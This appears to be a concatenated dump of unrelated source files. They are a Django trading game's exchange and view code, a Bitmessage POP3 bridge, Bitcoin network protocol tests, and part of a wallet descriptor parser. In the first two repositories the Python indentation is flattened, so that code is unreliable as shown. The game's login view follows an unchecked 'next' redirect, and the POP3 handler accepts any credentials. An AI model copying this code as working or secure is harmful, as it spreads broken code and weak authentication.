if self.offeror_bond:
self.offeror_bond.borrower = self.offeree
self.offeror_bond.save()
if self.offeree_as_bond:
bond = Bond(borrower=self.offeree, holder=self.offeror,
resources=self.offeree_resources,
territory=self.offeree_territory,
origin_exchange=self,
maturity=self.offeree_as_bond_maturity)
bond.save()
else:
if self._offeree_has_resources():
self.offeree.player.resources.subtract(self.offeree_resources)
self.offeror.player.resources.add(self.offeree_resources)
if self.offeree_territory:
self.offeree_territory.owner = self.offeror
self.offeree_territory.save()
if self.offeree_bond:
self.offeree_bond.borrower = self.offeror
self.offeree_bond.save()
self.offeree.player.resources.save()
self.offeror.player.resources.save()
self.state = self.ACCEPTED
self.answer_date = timezone.now()
self.save()
return True
def _undo_offer(self):
if self.state != self.WAITING:
raise ValidationError(_("This exchange is not waiting for response."))
if self._offeror_has_resources():
self.offeror.player.resources.add(self.offeror_resources)
def reject(self, user):
"""
Offeree `user` rejects the exchange.
"""
self._validate_user_as_offeree(user=user)
self._undo_offer()
self.state = self.REJECTED
self.answer_date = timezone.now()
self.save()
return True
def cancel(self, user):
"""
Offeror `user` cancels the exchange. Operation identical to rejection.
"""
self._validate_user_as_offeror(user=user)
self._undo_offer()
self.state = self.CANCELED
self.answer_date = timezone.now()
self.save()
return True
def is_waiting(self):
return self.state == self.WAITING
def is_accepted(self):
return self.state == self.ACCEPTED
def is_rejected(self):
return self.state == self.REJECTED
def is_canceled(self):
return self.state == self.CANCELED
def includes_currency(self):
return (self._offeror_has_resources() and self.offeror_resources.has_currency()) \
or (self._offeree_has_resources() and self.offeree_resources.has_currency())
def includes_agricultural(self):
return (self._offeror_has_resources() and self.offeror_resources.has_agricultural()) \
or (self._offeree_has_resources() and self.offeree_resources.has_agricultural())
def includes_manufactured(self):
return (self._offeror_has_resources() and self.offeror_resources.has_manufactured()) \
or (self._offeree_has_resources() and self.offeree_resources.has_manufactured())
def includes_resources(self):
return self._offeror_has_resources() or self._offeree_has_resources()
def includes_territories(self):
return self.offeror_territory or self.offeree_territory
def includes_bonds(self):
return self.offeror_bond or self.offeree_bond
def is_gift(self):
"""
    True if exactly one side of this exchange is non-empty (a one-way transfer).
"""
offeror = (self._offeror_has_resources() or self.offeror_territory is not None or \
self.offeror_bond is not None) or False
offeree = (self._offeree_has_resources() or self.offeree_territory is not None or \
self.offeree_bond is not None) or False
return offeror ^ offeree
```
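The `Exchange` flow documented above ultimately rests on the `Resources` arithmetic: `offer()` holds the offeror's goods with `subtract()`, `accept()` hands them over with `add()`, and `covers()` guards sufficiency. A minimal sketch of that arithmetic, assuming a configured Django settings module so `game.models` can be imported (unsaved instances only, no database needed); it is illustrative, not part of the repository:
```python
# Illustrative only: requires Django settings to be configured before import.
from game.models import Resources

wallet = Resources(currency=100, agricultural=20)
price = Resources(currency=40, manufactured=5)

print(wallet.covers(price))   # False: the wallet holds no manufactured goods
price.manufactured = 0
print(wallet.covers(price))   # True: every field of price is covered
wallet.subtract(price)        # what offer() does to the offeror's resources
print(str(wallet))            # currency=60, agricultural=20
```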
#### File: game/templatetags/game_tags.py
```python
from django import template
from game.config import Config
register = template.Library()
@register.simple_tag
def get_verbose_field_name(instance, field_name):
"""
Returns verbose_name for a field.
"""
return instance._meta.get_field(field_name).verbose_name.title()
@register.simple_tag
def get_field_value(instance, field_name):
"""
  Returns the value of a field.
"""
return getattr(instance, field_name)
@register.simple_tag
def current_game_date():
return Config.current_game_date()
@register.simple_tag
def to_game_date(date):
return Config.to_game_date(date)
```
#### File: ironandblood/game/views.py
```python
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.db.models import Q
from django.http import HttpResponseRedirect
from django.shortcuts import render, render_to_response, redirect
from django.template import RequestContext
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.csrf import csrf_protect
from .models import Player, Resources, Territory, Exchange, Bond
from .forms import ExchangeForm
def build_context(request, context = {}):
"""
Build a context dictionary with information for the base html page.
"""
ctx = {
'waiting_exchanges': Exchange.objects.filter(offeree = request.user,
state = Exchange.WAITING),
'pending_bonds': Bond.objects.filter(borrower = request.user,
state = Bond.PENDING),
}
ctx.update(context)
return ctx
@login_required(login_url='game:login')
@csrf_protect
def bonds(request, state=Bond.PENDING):
rb = Bond.objects.filter(holder = request.user).order_by('-pk')
sb = Bond.objects.filter(borrower = request.user).order_by('-pk')
states = list(state)
rb = rb.filter(state__in = states)
sb = sb.filter(state__in = states)
return render(request, 'game/bonds.html', build_context(request, {
'users': User.objects.all(),
'as_holder_bonds': rb,
'as_borrower_bonds': sb,
'states': states
}))
@login_required(login_url='game:login')
def update_bond(request, bond_pk):
if request.POST:
pay = 'pay' in request.POST
forgive = 'forgive' in request.POST
valid = pay ^ forgive
if valid:
try:
bond = Bond.objects.get(pk = bond_pk)
if pay:
bond.pay(user=request.user)
messages.success(request, _('Bond paid!'))
elif forgive:
bond.forgive(user=request.user)
messages.info(request, _('Bond forgiven.'))
else:
raise ValidationError(_('Unknown operation.'))
except ValidationError as e:
if e.params:
messages.error(request, e.message % e.params)
else:
messages.error(request, e.message)
return HttpResponseRedirect(reverse('game:bonds'))
@login_required(login_url='game:login')
def bond_by_user(request, username, state=Bond.PENDING):
user = User.objects.get(username = username)
users = [request.user, user]
bonds_history = Bond.objects.filter(holder__in = users,
borrower__in = users)
states = list(state)
bonds_history = bonds_history.filter(state__in = states)
return render(request, 'game/bond_by_user.html', build_context(request, {
'user': user,
'bonds_history': bonds_history,
'states': states
}))
@login_required(login_url='game:login')
@csrf_protect
def exchanges(request, state=Exchange.WAITING):
re = Exchange.objects.filter(offeree = request.user).order_by('-offer_date')
se = Exchange.objects.filter(offeror = request.user).order_by('-offer_date')
states = list(state)
re = re.filter(state__in = states)
se = se.filter(state__in = states)
return render(request, 'game/exchanges.html', build_context(request, {
'users': User.objects.all(),
'received_exchanges': re,
'sent_exchanges': se,
'states': states
}))
@login_required(login_url='game:login')
def update_exchange(request, exchange_pk):
if request.POST:
accept = 'accept' in request.POST
reject = 'reject' in request.POST
cancel = 'cancel' in request.POST
valid = accept ^ reject ^ cancel
if valid:
try:
exch = Exchange.objects.get(pk = exchange_pk)
if accept:
exch.accept(user=request.user)
messages.success(request, _('Exchange accepted!'))
elif reject:
exch.reject(user=request.user)
messages.info(request, _('Exchange rejected.'))
elif cancel:
exch.cancel(user=request.user)
messages.info(request, _('Exchange canceled.'))
else:
raise ValidationError(_('Unknown operation.'))
except ValidationError as e:
if e.params:
messages.error(request, e.message % e.params)
else:
messages.error(request, e.message)
return HttpResponseRedirect(reverse('game:exchanges'))
@login_required(login_url='game:login')
def new_exchange(request, offeree, state=Exchange.WAITING):
offeree_obj = User.objects.get(username = offeree)
form = ExchangeForm(request.user, offeree_obj, request.POST or None)
error_message = None
if form.is_valid():
try:
id_offeror_territory = request.POST['id_offeror_territory']
id_offeree_territory = request.POST['id_offeree_territory']
resource = form.build_and_offer(request.user, offeree_obj,
id_offeror_territory = id_offeror_territory,
id_offeree_territory = id_offeree_territory)
except ValidationError as e:
if e.params:
messages.error(request, e.message % e.params)
else:
messages.error(request, e.message)
else:
messages.success(request, _('Exchange offer sent!'))
return HttpResponseRedirect(reverse('game:exchanges'))
users = [request.user, offeree_obj]
exchange_history = Exchange.objects.filter(offeror__in = users,
offeree__in = users)
states = list(state)
exchange_history = exchange_history.filter(state__in = states)
return render(request, 'game/new_exchange.html', build_context(request, {
'form': form,
'offeree': offeree_obj,
'territories': Territory.objects.all(),
'exchange_history': exchange_history,
'states': states
}))
@login_required(login_url='game:login')
def home(request):
territories = Territory.objects.all()
users = User.objects.all()
colors = ['#659BA3', '#725E54', '#FFEBB5', '#996982', '#01704B']
dct = dict()
for t in territories:
dct[t.code] = colors[t.owner.pk % len(colors)]
user_legend = dict()
for u in users:
user_legend[u.username] = colors[u.pk % len(colors)]
return render(request, 'game/home.html', build_context(request, {
'colors': dct,
'colors_legend': user_legend
}))
@login_required(login_url='game:login')
def logout_view(request):
logout(request)
return redirect(reverse('game:login'))
def login_view(request):
state = _("Please log in above.")
alert_type = 'info'
username = password = ''
if request.POST:
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect(request.GET.get('next', '/'))
else:
alert_type = 'danger'
state = _("Your account is not active, please contact the site admin.")
else:
alert_type = 'danger'
state = _("Your username and/or password were incorrect.")
context = {'alert_type': alert_type, 'state': state, 'username': username}
return render_to_response('game/login.html', RequestContext(request, context))
@login_required(login_url='game:login')
def profile(request):
return render(request, 'game/home.html', {})
``` |
{
"source": "jimmysong/bmwrapper",
"score": 2
} |
#### File: jimmysong/bmwrapper/incoming.py
```python
import socket
import threading
import email.mime.text
import email.mime.image
import email.mime.multipart
import email.header
import bminterface
import re
import select
import logging
class ChatterboxConnection(object):
END = "\r\n"
def __init__(self, conn):
self.conn = conn
def __getattr__(self, name):
return getattr(self.conn, name)
def sendall(self, data, END=END):
data += END
self.conn.sendall(data)
def recvall(self, END=END):
data = []
while True:
chunk = self.conn.recv(4096)
if END in chunk:
data.append(chunk[:chunk.index(END)])
break
data.append(chunk)
if len(data) > 1:
pair = data[-2] + data[-1]
if END in pair:
data[-2] = pair[:pair.index(END)]
data.pop()
break
return "".join(data)
def handleUser(data):
return "+OK user accepted"
def handlePass(data):
return "+OK pass accepted"
def _getMsgSizes():
msgCount = bminterface.listMsgs()
msgSizes = []
for msgID in range(msgCount):
logging.debug("Parsing msg %i of %i" % (msgID+1, msgCount))
dateTime, toAddress, fromAddress, subject, body = bminterface.get(msgID)
msgSizes.append(len(makeEmail(dateTime, toAddress, fromAddress, subject, body)))
return msgSizes
def handleStat(data):
msgSizes = _getMsgSizes()
msgCount = len(msgSizes)
msgSizeTotal = 0
for msgSize in msgSizes:
msgSizeTotal += msgSize
returnData = '+OK %i %i' % (msgCount, msgSizeTotal)
logging.debug("Answering STAT: %i %i" % (msgCount, msgSizeTotal))
return returnData
def handleList(data):
    parts = data.split()
    msgId = parts[1] if len(parts) > 1 else None
msgSizes = _getMsgSizes()
if msgId is not None:
# means the server wants a single message response
i = int(msgId) - 1
if i >= len(msgSizes):
return "-ERR no such message"
else:
msgSize = msgSizes[i]
return "+OK %s %s" % (msgId, msgSize)
msgCount = 0
returnDataPart2 = ''
msgSizeTotal = 0
for msgSize in msgSizes:
msgSizeTotal += msgSize
msgCount += 1
returnDataPart2 += '%i %i\r\n' % (msgCount, msgSize)
returnDataPart2 += '.'
returnDataPart1 = '+OK %i messages (%i octets)\r\n' % (msgCount, msgSizeTotal)
returnData = returnDataPart1 + returnDataPart2
logging.debug("Answering LIST: %i %i" % (msgCount, msgSizeTotal))
logging.debug(returnData)
return returnData
def handleTop(data):
msg = 'test'
logging.debug(data.split())
cmd, msgID, lines = data.split()
msgID = int(msgID)-1
lines = int(lines)
logging.debug(lines)
dateTime, toAddress, fromAddress, subject, body = bminterface.get(msgID)
logging.debug(subject)
msg = makeEmail(dateTime, toAddress, fromAddress, subject, body)
top, bot = msg.split("\n\n", 1)
#text = top + "\r\n\r\n" + "\r\n".join(bot[:lines])
return "+OK top of message follows\r\n%s\r\n." % top
def handleRetr(data):
logging.debug(data.split())
msgID = int(data.split()[1])-1
dateTime, toAddress, fromAddress, subject, body = bminterface.get(msgID)
msg = makeEmail(dateTime, toAddress, fromAddress, subject, body)
return "+OK %i octets\r\n%s\r\n." % (len(msg), msg)
def handleDele(data):
msgID = int(data.split()[1])-1
bminterface.markForDelete(msgID)
return "+OK I'll try..."
def handleNoop(data):
return "+OK"
def handleQuit(data):
bminterface.cleanup()
return "+OK just pretend I'm gone"
def handleCapa(data):
returnData = "+OK List of capabilities follows\r\n"
returnData += "CAPA\r\nTOP\r\nUSER\r\nPASS\r\nUIDL\r\n."
return returnData
def handleUIDL(data):
data = data.split()
logging.debug(data)
if len(data) == 1:
refdata = bminterface.getUIDLforAll()
else:
refdata = bminterface.getUIDLforSingle(int(data[1])-1)
logging.debug(refdata)
if len(refdata) == 1:
returnData = '+OK ' + data[0] + str(refdata[0])
else:
returnData = '+OK listing UIDL numbers...\r\n'
for msgID in range(len(refdata)):
returnData += str(msgID+1) + ' ' + refdata[msgID] + '\r\n'
returnData += '.'
return returnData
def makeEmail(dateTime, toAddress, fromAddress, subject, body):
body = parseBody(body)
msgType = len(body)
if msgType == 1:
msg = email.mime.text.MIMEText(body[0], 'plain', 'UTF-8')
else:
msg = email.mime.multipart.MIMEMultipart('mixed')
bodyText = email.mime.text.MIMEText(body[0], 'plain', 'UTF-8')
body = body[1:]
msg.attach(bodyText)
for item in body:
img = 0
itemType, itemData = [0], [0]
try:
itemType, itemData = item.split(';', 1)
itemType = itemType.split('/', 1)
except:
logging.warning("Could not parse message type")
pass
if itemType[0] == 'image':
try:
                    itemDataFinal = itemData.split('base64,', 1)[-1].strip(' ').strip('\n').decode('base64')
img = email.mime.image.MIMEImage(itemDataFinal)
except:
#Some images don't auto-detect type correctly with email.mime.image
#Namely, jpegs with embeded color profiles look problematic
#Trying to set it manually...
try:
                        itemDataFinal = itemData.split('base64,', 1)[-1].strip(' ').strip('\n').decode('base64')
img = email.mime.image.MIMEImage(itemDataFinal, _subtype=itemType[1])
except:
logging.warning("Failed to parse image data. This could be an image.")
logging.warning("This could be from an image tag filled with junk data.")
logging.warning("It could also be a python email.mime.image problem.")
if img:
img.add_header('Content-Disposition', 'attachment')
msg.attach(img)
msg['To'] = toAddress
msg['From'] = fromAddress
msg['Subject'] = email.header.Header(subject, 'UTF-8')
msg['Date'] = dateTime
return msg.as_string()
def parseBody(body):
returnData = []
text = ''
searchString = '<img[^>]*'
attachment = re.search(searchString, body)
while attachment:
imageCode = body[attachment.start():attachment.end()]
imageDataRange = re.search('src=[\"\'][^\"\']*[\"\']', imageCode)
imageData=''
if imageDataRange:
try:
                imageData = imageCode[imageDataRange.start()+5:imageDataRange.end()-1].split('data:', 1)[-1]
except:
pass
if imageData:
returnData.append(imageData)
body = body[:attachment.start()] + body[attachment.end()+1:]
attachment = re.search(searchString, body)
text = body
returnData = [text] + returnData
return returnData
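

# Hedged illustration (not part of the original module): parseBody() returns the
# message text first, followed by the raw payload of every <img> tag it removed.
# The tiny base64 string below is an invented placeholder.
def _parseBody_example():
    body = 'hello <img src="data:image/png;base64,iVBORw0KGgo="> world'
    return parseBody(body)
    # -> ['hello  world', 'image/png;base64,iVBORw0KGgo=']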
dispatch = dict(
USER=handleUser,
PASS=handlePass,
STAT=handleStat,
LIST=handleList,
TOP=handleTop,
RETR=handleRetr,
DELE=handleDele,
NOOP=handleNoop,
QUIT=handleQuit,
CAPA=handleCapa,
UIDL=handleUIDL,
)
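
# Hedged illustration of a session handled by the dispatch table above
# (message counts, sizes and bodies are invented placeholders):
#   C: USER anything         S: +OK user accepted
#   C: STAT                  S: +OK 2 3415
#   C: LIST                  S: +OK 2 messages (3415 octets)  1 1200  2 2215  .
#   C: RETR 1                S: +OK 1200 octets  <RFC 2822 message>  .
#   C: QUIT                  S: +OK just pretend I'm gone
# Multi-line responses are really CRLF-separated and terminated by a lone ".".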
def incomingServer(host, port, run_event):
popthread = threading.Thread(target=incomingServer_main, args=(host, port, run_event))
popthread.daemon = True
popthread.start()
return popthread
def incomingServer_main(host, port, run_event):
sock = None
try:
while run_event.is_set():
if sock is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((host, port))
sock.listen(1)
ready = select.select([sock], [], [], .2)
if ready[0]:
conn, addr = sock.accept()
# stop listening, one client only
sock.close()
sock = None
try:
conn = ChatterboxConnection(conn)
conn.sendall("+OK server ready")
while run_event.is_set():
data = conn.recvall()
command = data.split(None, 1)[0]
try:
cmd = dispatch[command]
except KeyError:
conn.sendall("-ERR unknown command")
else:
conn.sendall(cmd(data))
if cmd is handleQuit:
break
finally:
conn.close()
except (SystemExit, KeyboardInterrupt):
pass
except Exception, ex:
raise
finally:
if sock is not None:
sock.close()
``` |
{
"source": "jimmysong/buidl-python",
"score": 2
} |
#### File: buidl/test/test_network.py
```python
from unittest import TestCase
from io import BytesIO
from buidl.block import Block
from buidl.helper import decode_base58, decode_gcs
from buidl.network import (
BASIC_FILTER_TYPE,
CFCheckPointMessage,
CFHeadersMessage,
CFilterMessage,
FILTERED_BLOCK_DATA_TYPE,
GetDataMessage,
GetHeadersMessage,
GetCFCheckPointMessage,
GetCFHeadersMessage,
GetCFiltersMessage,
HeadersMessage,
NetworkEnvelope,
SimpleNode,
VersionMessage,
)
class NetworkEnvelopeTest(TestCase):
def test_parse(self):
msg = bytes.fromhex("f9beb4d976657261636b000000000000000000005df6e0e2")
stream = BytesIO(msg)
envelope = NetworkEnvelope.parse(stream)
self.assertEqual(envelope.command, b"verack")
self.assertEqual(envelope.payload, b"")
msg = bytes.fromhex(
"f9beb4d976657273696f6e0000000000650000005f1a69d2721101000100000000000000bc8f5e5400000000010000000000000000000000000000000000ffffc61b6409208d010000000000000000000000000000000000ffffcb0071c0208d128035cbc97953f80f2f5361746f7368693a302e392e332fcf05050001"
)
stream = BytesIO(msg)
envelope = NetworkEnvelope.parse(stream)
self.assertEqual(envelope.command, b"version")
self.assertEqual(envelope.payload, msg[24:])
def test_serialize(self):
msg = bytes.fromhex("f9beb4d976657261636b000000000000000000005df6e0e2")
stream = BytesIO(msg)
envelope = NetworkEnvelope.parse(stream)
self.assertEqual(envelope.serialize(), msg)
msg = bytes.fromhex(
"f9beb4d976657273696f6e0000000000650000005f1a69d2721101000100000000000000bc8f5e5400000000010000000000000000000000000000000000ffffc61b6409208d010000000000000000000000000000000000ffffcb0071c0208d128035cbc97953f80f2f5361746f7368693a302e392e332fcf05050001"
)
stream = BytesIO(msg)
envelope = NetworkEnvelope.parse(stream)
self.assertEqual(envelope.serialize(), msg)
class VersionMessageTest(TestCase):
def test_serialize(self):
v = VersionMessage(timestamp=0, nonce=b"\x00" * 8)
self.assertEqual(
v.serialize().hex(),
"7f11010000000000000000000000000000000000000000000000000000000000000000000000ffff000000008d20000000000000000000000000000000000000ffff000000008d2000000000000000001b2f70726f6772616d6d696e67626c6f636b636861696e3a302e312f0000000001",
)
class GetHeadersMessageTest(TestCase):
def test_serialize(self):
block_hex = "0000000000000000001237f46acddf58578a37e213d2a6edc4884a2fcad05ba3"
gh = GetHeadersMessage(start_block=bytes.fromhex(block_hex))
self.assertEqual(
gh.serialize().hex(),
"7f11010001a35bd0ca2f4a88c4eda6d213e2378a5758dfcd6af437120000000000000000000000000000000000000000000000000000000000000000000000000000000000",
)
class HeadersMessageTest(TestCase):
def test_parse(self):
hex_msg = "0200000020df3b053dc46f162a9b00c7f0d5124e2676d47bbe7c5d0793a500000000000000ef445fef2ed495c275892206ca533e7411907971013ab83e3b47bd0d692d14d4dc7c835b67d8001ac157e670000000002030eb2540c41025690160a1014c577061596e32e426b712c7ca00000000000000768b89f07044e6130ead292a3f51951adbd2202df447d98789339937fd006bd44880835b67d8001ade09204600"
stream = BytesIO(bytes.fromhex(hex_msg))
headers = HeadersMessage.parse(stream)
self.assertEqual(len(headers.headers), 2)
for b in headers.headers:
self.assertEqual(b.__class__, Block)
class GetDataMessageTest(TestCase):
def test_serialize(self):
hex_msg = "020300000030eb2540c41025690160a1014c577061596e32e426b712c7ca00000000000000030000001049847939585b0652fba793661c361223446b6fc41089b8be00000000000000"
get_data = GetDataMessage()
block1 = bytes.fromhex(
"00000000000000cac712b726e4326e596170574c01a16001692510c44025eb30"
)
get_data.add_data(FILTERED_BLOCK_DATA_TYPE, block1)
block2 = bytes.fromhex(
"00000000000000beb88910c46f6b442312361c6693a7fb52065b583979844910"
)
get_data.add_data(FILTERED_BLOCK_DATA_TYPE, block2)
self.assertEqual(get_data.serialize().hex(), hex_msg)
# FIXME: make this work
# Getting: ConnectionRefusedError: [Errno 61] Connection refused
if False:
class SimpleNodeTest(TestCase):
def test_handshake(self):
node = SimpleNode("tbtc.programmingblockchain.com", testnet=True)
node.handshake()
def test_get_filtered_txs(self):
from buidl.bloomfilter import BloomFilter
bf = BloomFilter(30, 5, 90210)
h160 = decode_base58("mseRGXB89UTFVkWJhTRTzzZ9Ujj4ZPbGK5")
bf.add(h160)
node = SimpleNode("tbtc.programmingblockchain.com", testnet=True)
node.handshake()
node.send(bf.filterload())
block_hash = bytes.fromhex(
"00000000000377db7fde98411876c53e318a395af7304de298fd47b7c549d125"
)
txs = node.get_filtered_txs([block_hash])
self.assertEqual(
txs[0].id(),
"0c024b9d3aa2ae8faae96603b8d40c88df2fc6bf50b3f446295206f70f3cf6ad",
)
self.assertEqual(
txs[1].id(),
"0886537e27969a12478e0d33707bf6b9fe4fdaec8d5d471b5304453b04135e7e",
)
self.assertEqual(
txs[2].id(),
"23d4effc88b80fb7dbcc2e6a0b0af9821c6fe3bb4c8dc3b61bcab7c45f0f6888",
)
class CFilterTest(TestCase):
def test_cfilter(self):
stop_hash = bytes.fromhex(
"000000006f27ddfe1dd680044a34548f41bed47eba9e6f0b310da21423bc5f33"
)
getcfilters = GetCFiltersMessage(stop_hash=stop_hash)
expected = b"\x00\x01\x00\x00\x00" + stop_hash[::-1]
self.assertEqual(getcfilters.serialize(), expected)
expected = (
b"\x00" + stop_hash[::-1] + b"\x09" + bytes.fromhex("0385acb4f0fe889ef0")
)
cfilter = CFilterMessage.parse(BytesIO(expected))
self.assertEqual(cfilter.filter_type, 0)
self.assertEqual(cfilter.block_hash, stop_hash)
self.assertEqual(cfilter.hashes, {1341840, 1483084, 570774})
self.assertEqual(cfilter.hash(b"\x00"), 1322199)
included = bytes.fromhex(
"002027a5000c7917f785d8fc6e5a55adfca8717ecb973ebb7743849ff956d896a7ed"
)
self.assertTrue([included] in cfilter)
self.assertFalse([b"\x00"] in cfilter)
with self.assertRaises(RuntimeError):
GetCFiltersMessage()
def test_cfilter_without_network(self):
# Example from Trezor Blog Post (https://blog.trezor.io/bip158-compact-block-filters-9b813b07a878)
block_hash_hex = (
"000000000000015d6077a411a8f5cc95caf775ccf11c54e27df75ce58d187313"
)
filter_hex = "09027acea61b6cc3fb33f5d52f7d088a6b2f75d234e89ca800"
key = bytes.fromhex(block_hash_hex)[::-1][:16]
filter_bytes = bytes.fromhex(filter_hex)
cfilter = CFilterMessage(
filter_type=BASIC_FILTER_TYPE,
block_hash=bytes.fromhex(block_hash_hex),
filter_bytes=filter_bytes,
hashes=decode_gcs(key, filter_bytes),
)
for script, want in (
("76a9143ebc40e411ed3c76f86711507ab952300890397288ac", True),
("76a914c01a7ca16b47be50cbdbc60724f701d52d75156688ac", True),
("76a914000000000000000000000000000000000000000088ac", False), # made up
):
self.assertEqual(bytes.fromhex(script) in cfilter, want)
class CFHeaderTest(TestCase):
def test_cfheader(self):
stop_hash = bytes.fromhex(
"000000006f27ddfe1dd680044a34548f41bed47eba9e6f0b310da21423bc5f33"
)
getcfheaders = GetCFHeadersMessage(stop_hash=stop_hash)
self.assertEqual(
getcfheaders.serialize(), b"\x00\x00\x00\x00\x00" + stop_hash[::-1]
)
hash2 = b"\x00" * 32
stream = BytesIO(
bytes.fromhex(
"00335fbc2314a20d310b6f9eba7ed4be418f54344a0480d61dfedd276f000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000"
)
)
cfheaders = CFHeadersMessage.parse(stream)
self.assertEqual(cfheaders.filter_type, 0)
self.assertEqual(cfheaders.stop_hash, stop_hash)
self.assertEqual(cfheaders.previous_filter_header, hash2)
self.assertEqual(cfheaders.filter_hashes, [hash2])
with self.assertRaises(RuntimeError):
GetCFHeadersMessage()
class CFCheckPointTest(TestCase):
def test_cfcheckpoint(self):
stop_hash = bytes.fromhex(
"000000006f27ddfe1dd680044a34548f41bed47eba9e6f0b310da21423bc5f33"
)
getcfcheckpoints = GetCFCheckPointMessage(stop_hash=stop_hash)
self.assertEqual(getcfcheckpoints.serialize(), b"\x00" + stop_hash[::-1])
hash2 = b"\x00" * 32
stream = BytesIO(
bytes.fromhex(
"00335fbc2314a20d310b6f9eba7ed4be418f54344a0480d61dfedd276f00000000010000000000000000000000000000000000000000000000000000000000000000000000"
)
)
cfcheckpoints = CFCheckPointMessage.parse(stream)
self.assertEqual(cfcheckpoints.filter_type, 0)
self.assertEqual(cfcheckpoints.stop_hash, stop_hash)
self.assertEqual(cfcheckpoints.filter_headers, [hash2])
with self.assertRaises(RuntimeError):
GetCFCheckPointMessage()
``` |
{
"source": "jimmysong/embit",
"score": 3
} |
#### File: embit/descriptor/arguments.py
```python
from binascii import hexlify, unhexlify
from .base import DescriptorBase, read_until
from .errors import ArgumentError
from .. import bip32, ec, compact, hashes
class KeyOrigin:
def __init__(self, fingerprint: bytes, derivation: list):
self.fingerprint = fingerprint
self.derivation = derivation
@classmethod
def from_string(cls, s: str):
arr = s.split("/")
mfp = unhexlify(arr[0])
assert len(mfp) == 4
arr[0] = "m"
path = "/".join(arr)
derivation = bip32.parse_path(path)
return cls(mfp, derivation)
def __str__(self):
return bip32.path_to_str(self.derivation, fingerprint=self.fingerprint)
class AllowedDerivation(DescriptorBase):
# xpub/{0,1}/* - {0,1} is a set of allowed branches, wildcard * is stored as None
def __init__(self, indexes=[[0, 1], None]):
# check only one wildcard and only one set is in the derivation
if len([i for i in indexes if i is None]) > 1:
raise ArgumentError("Only one wildcard is allowed")
        if len([i for i in indexes if isinstance(i, list)]) > 1:
            raise ArgumentError("Only one set of branch indexes is allowed")
self.indexes = indexes
@property
def is_wildcard(self):
return None in self.indexes
def fill(self, idx, branch_index=None):
# None is ok
if idx is not None and (idx < 0 or idx >= 0x80000000):
raise ArgumentError("Hardened indexes are not allowed in wildcard")
arr = [i for i in self.indexes]
for i, el in enumerate(arr):
if el is None:
arr[i] = idx
if isinstance(el, list):
if branch_index is None:
arr[i] = el[0]
else:
if branch_index < 0 or branch_index >= len(el):
raise ArgumentError("Invalid branch index")
arr[i] = el[branch_index]
return arr
def branch(self, branch_index):
arr = self.fill(None, branch_index)
return type(self)(arr)
def check_derivation(self, derivation: list):
if len(derivation) != len(self.indexes):
return None
branch_idx = 0 # default branch if no branches in descriptor
idx = None
for i, el in enumerate(self.indexes):
der = derivation[i]
if isinstance(el, int):
if el != der:
return None
# branch
elif isinstance(el, list):
if der not in el:
return None
branch_idx = el.index(der)
# wildcard
elif el is None:
idx = der
# shouldn't happen
else:
raise ArgumentError("Strange derivation index...")
if branch_idx is not None and idx is not None:
return branch_idx, idx
@classmethod
def default(cls):
return AllowedDerivation([[0, 1], None])
@property
def branches(self):
for el in self.indexes:
if isinstance(el, list):
return el
return None
@property
def has_hardend(self):
for idx in self.indexes:
if isinstance(idx, int) and idx >= 0x80000000:
return True
if isinstance(idx, list) and len([i for i in idx if i >= 0x80000000]) > 0:
return True
return False
@classmethod
def from_string(cls, der: str, allow_hardened=False, allow_set=True):
if len(der) == 0:
return None
indexes = [
cls.parse_element(d, allow_hardened, allow_set) for d in der.split("/")
]
return cls(indexes)
@classmethod
def parse_element(cls, d: str, allow_hardened=False, allow_set=True):
# wildcard
if d == "*":
return None
# branch set
if d[0] == "{" and d[-1] == "}":
if not allow_set:
raise ArgumentError("Set is not allowed in derivation %s" % d)
return [
cls.parse_element(dd, allow_hardened, allow_set=False)
for dd in d[1:-1].split(",")
]
idx = 0
if d[-1] == "h":
if not allow_hardened:
raise ArgumentError("Hardened derivation is not allowed in %s" % d)
idx = 0x80000000
d = d[:-1]
i = int(d)
if i < 0 or i >= 0x80000000:
raise ArgumentError("Derivation index can be in a range [0, 0x80000000)")
return idx + i
def __str__(self):
r = ""
for idx in self.indexes:
if idx is None:
r += "/*"
if isinstance(idx, int):
if idx >= 0x80000000:
r += "/%dh" % (idx - 0x80000000)
else:
r += "/%d" % idx
if isinstance(idx, list):
r += "/{"
r += ",".join(
[
str(i) if i < 0x80000000 else str(i - 0x80000000) + "h"
for i in idx
]
)
r += "}"
return r
class Key(DescriptorBase):
def __init__(self, key, origin=None, derivation=None):
self.origin = origin
self.key = key
if not hasattr(key, "derive") and derivation is not None:
raise ArgumentError("Key %s doesn't support derivation" % key)
self.allowed_derivation = derivation
def __len__(self):
return 34 # <33:sec> - only compressed pubkeys
@property
def fingerprint(self):
return None if self.origin is None else self.origin.fingerprint
@property
def derivation(self):
return [] if self.origin is None else self.origin.derivation
@classmethod
def read_from(cls, s):
first = s.read(1)
origin = None
if first == b"[":
prefix, char = read_until(s, b"]")
if char != b"]":
raise ArgumentError("Invalid key - missing ]")
origin = KeyOrigin.from_string(prefix.decode())
else:
s.seek(-1, 1)
k, char = read_until(s, b",)/")
der = b""
# there is a following derivation
if char == b"/":
der, char = read_until(s, b"{,)")
# we get a set of possible branches: {a,b,c...}
if char == b"{":
der += b"{"
branch, char = read_until(s, b"}")
if char is None:
raise ArgumentError("Failed reading the key, missing }")
der += branch + b"}"
rest, char = read_until(s, b",)")
der += rest
if char is not None:
s.seek(-1, 1)
# parse key
k = cls.parse_key(k)
# parse derivation
allow_hardened = isinstance(k, bip32.HDKey) and isinstance(k.key, ec.PrivateKey)
derivation = AllowedDerivation.from_string(
der.decode(), allow_hardened=allow_hardened
)
return cls(k, origin, derivation)
@classmethod
def parse_key(cls, k: bytes):
# convert to string
k = k.decode()
if len(k) in [66, 130] and k[:2] in ["02", "03", "04"]:
# bare public key
return ec.PublicKey.parse(unhexlify(k))
elif k[1:4] in ["pub", "prv"]:
# bip32 key
return bip32.HDKey.from_base58(k)
else:
return ec.PrivateKey.from_wif(k)
@property
def is_extended(self):
return isinstance(self.key, bip32.HDKey)
def check_derivation(self, derivation_path):
if self.origin is None:
return None
